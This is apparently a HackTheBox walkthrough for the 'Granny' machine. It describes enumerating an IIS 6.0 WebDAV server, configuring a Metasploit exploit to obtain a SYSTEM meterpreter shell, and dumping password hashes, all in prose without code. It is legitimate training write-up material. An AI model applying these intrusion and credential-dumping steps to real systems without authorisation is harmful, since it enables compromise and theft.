Granny HTB Walkthrough
Hello Everyone. This is my writeup for the machine Granny on HackTheBox.
We already know that this is a Windows machine.
First let’s perform scanning and enumeration using nmap.
We observe that the system has port 80 open with http service running and that it is using Microsoft IIS httpd 6.0.
There are a lot of potentially risky methods allowed, notable one being PUT method, which allows us to upload files.
We also notice that WebDAV is present on this http server.
Considering all of the above, we can enumerate port 80 using nikto. Also, we specifically enumerate WebDAV using davtest to see if there is a possibility of uploading a shell file and executing it.
There are some interesting details found by nikto. We can browse directories /_vti_bin/ and /_private/ to see if there are any files containing sensitive information.
Davtest output revealed that we can upload a lot of different formats but most files used for gaining remote access cannot be executed.
Browsing the directories /_vti_bin/ and /_private/, we found the following.
There was no interesting data found after browsing through all the files and directories present in /_vti_bin/ directory. Directory search also did not reveal any more directories.
Let’s enumerate Microsoft IIS httpd 6.0 to see if any exploit is available.
Look what we found!
Our http server uses WebDAV, and we know that it is a Windows machine.
Let’s give it a try.
Open metasploit and select the appropriate settings for the exploit.
Mainly, ensure that the following settings are configured correctly:
RHOSTS: Target IP
TARGETURI: /_vti_bin/ in our case
LHOST: Attacker IP
Time to fire the exploit. Voila! We have a meterpreter shell as shown below.
We are system user, so we should be able to get both the user and root flags. Let’s start a shell session using shell command.
This will start a shell session and allow you to use windows command prompt commands.
We can enumerate more about the system now and also get the hashes using hashdump in meterpreter shell.
A lot of post exploitation steps can be performed but the end goal of any CTF machine is to get the user and root flags.
